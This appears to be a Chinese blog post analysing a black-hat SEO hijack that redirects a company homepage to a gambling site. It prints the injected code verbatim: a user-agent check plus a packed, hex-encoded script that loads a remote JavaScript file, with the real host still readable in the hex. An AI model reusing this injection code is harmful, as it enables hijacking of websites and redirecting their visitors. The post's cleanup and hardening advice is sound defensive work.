[dns被劫持怎么办]详解分析,解决黑帽seo劫持问题。网站从百度搜索进去,首页发生跳转到菠菜网,开发公司的说可能是百度的问题,不是我们的问题,针对这个就想提一下,首先遇到问题就去分析问题,再去找出问题,然后解决问题,最后做好防范措施,而不是首先就想着推脱责任。
直接进入正题site:(这里隐去了开发公司的网站网址,用来代替)
打开首页发生了跳转,到https://www.***.com/zh-cn/这个菠菜网,其他页面没有,劫持代码只放在首页,我们直接看代码
如果是无法直接从首页查看源码的情况,那么在浏览器输入view-source:就可以查看网页源码
只需要看头部代码好熟悉,黑帽seo这行技术这几年也没什么创新,删除这两行就可以解决基本问题
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu")==-1){document.title="中亿光伏-品牌光伏集成商"}</script>
<script type="text/javascript"a?"":e(parseInt(c/a)))+((c=c%a)<35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\n\\f\\8\\o\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\m\\4\\8\\d\\6\\0\\8\\j\\0\\5\\h\\a\\k\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\t\\0\\0\\4\\2\\\u\\5\\5\\7\\7\\7\\b\\v\\1\\e\\a\\2\\q\\b\\1\\c\\f\\5\\r\\p\\s\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',32,32,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62'.split('|'),0,{}))</script>
Keywords和description进行Unicode解码,结果:
******官方平台开户,******官方备用网址,******官方网站是多少,******官方亚洲版,******.com官方网站,******官方投注,******官方网站,******官方中文版,******中文官方网站,英国******官方网,******官方投注网站,******官方投注网址,******官方网投,******官方备用,******官方网站是多少
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu")==-1){document.title="中亿光伏-品牌光伏集成商"}</script>
这段意思就是判断百度搜索访问用户进行跳转,你去360,搜狗搜索访问肯定是不会发生跳转的,然后我们再来解最后一段代码
先进行js解压,得出结果
javascript代码方式解密
1:\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74 结果 document
2:\\x77\\x72\\x69\\x74\\x65 结果 write
3:\\x3c\\x73\\x63\\x72\\x69\\x70\\x74 \\x74\\x79\\x70\\x65\\x3d\\x22\\x74\\x65\\x78\\x74\\x2f\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x22\\x73\\x72\\x63\\x3d\\x22\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x77\\x77\\x77\\x2e\\x62\\x63\\x64\\x61\\x73\\x38\\x2e\\x63\\x6f\\x6d\\x2f\\x33\\x36\\x35\\x2e\\x6a\\x73\\x22\\x3e\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e
结果 <script type="text/javascript" src="https://www.***.com/365.js"></script>
整段的解密结果就是:
<script type="text/javascript"> window["document"]["write"] ('<script type="text/javascript" src="https://www.***.com/365.js"></script>'); </script>
到了这里整个过程已经很清晰了,虽然我们删除了这段代码但只能暂时解决问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是通过目前已经开放的漏洞,所以相对还是比较容易处理。
大多数人对网站的理解还停留在视觉层面,网络安全的重要性反而被忽视,任何公司都需要提高对网络安全的重视。
文章标题:[dns被劫持怎么办]详解分析,解决黑帽seo劫持问题
文章评论 本文章有个评论